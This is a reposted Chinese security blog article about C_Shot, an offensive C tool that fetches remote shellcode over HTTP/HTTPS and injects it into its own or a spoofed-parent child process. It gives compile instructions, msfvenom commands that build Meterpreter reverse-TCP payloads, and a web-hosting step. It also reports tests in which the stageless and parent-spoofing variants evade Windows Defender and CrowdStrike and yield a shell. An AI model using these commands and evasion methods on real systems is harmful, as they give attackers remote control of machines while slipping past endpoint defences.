Cshot – shellcode远程加载器

admin 2021年12月5日00:58:47评论485 views字数 1085阅读3分37秒阅读模式

From:

https://github.com/anthemtotheego/C_Shot

http://blog.redxorblue.com/2020/07/cshot-just-what-doctor-ordered.html

C_Shot是一种用C语言编写的攻击性安全工具,旨在通过HTTP / HTTPS下载远程shellcode二进制文件(.bin),注入并执行shellcode。

1.shellcode注入其自己的进程

2.使用父进程欺骗将shellcode注入子进程

使用C_Shot之类的工具的好处是,我们要执行的恶意代码没有存储在二进制文件中,而是从远程位置检索,读入内存然后执行。这有助于使诸如C_Shot之类的工具对AV / EDR显得相当友好,并且不会被发现。

Cshot – shellcode远程加载器

编译

cl / D _UNICODE / D UNICODE cshot.c

Cshot – shellcode远程加载器

生成分阶段payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -a x64 --platform windows -b "x00" -f raw -o /root/Desktop/DefaultStaged.bin

生成无阶段payload

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -a x64 --platform windows -b "x00" -f raw -o /root/Desktop/DefaultStageless.bin

现在我们已经建立了二进制文件,现在需要一个Web服务。例如运行python -m SimpleHTTPServer 80,或者将它们托管在外部某个地方。对于本文中的所有示例,我将使用github托管shellcode。

Cshot – shellcode远程加载器

确保windows defender打开。

Cshot – shellcode远程加载器

注入到自己的进程中

Cshot – shellcode远程加载器

测试分阶段的shellcode会被windows defender拦截

Cshot – shellcode远程加载器

无阶段的shellcode不会被拦截

Cshot – shellcode远程加载器

获得shell

Cshot – shellcode远程加载器

测试分阶段shellcode欺骗父进程方法:

Cshot – shellcode远程加载器

Cshot – shellcode远程加载器

获得shell

Cshot – shellcode远程加载器

现在测试下CrowdStrike

注入到自己的进程,两种shellcode都被拦截

Cshot – shellcode远程加载器

Cshot – shellcode远程加载器

欺骗父进程

Cshot – shellcode远程加载器

获得shell

Cshot – shellcode远程加载器

Cshot – shellcode远程加载器

分阶段和无阶段的shellcode在使用欺骗父进程方法时都可以绕过av。

此工具在公共发行版中,没有进行任何形式的API隐藏,字符串混淆,内存保护技巧等工作。如果未进行任何修改,则对该工具的静态分析应该很容易发现。


本文始发于微信公众号(关注安全技术):Cshot – shellcode远程加载器

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月5日00:58:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Cshot – shellcode远程加载器https://cn-sec.com/archives/500888.html

发表评论

匿名网友 填写信息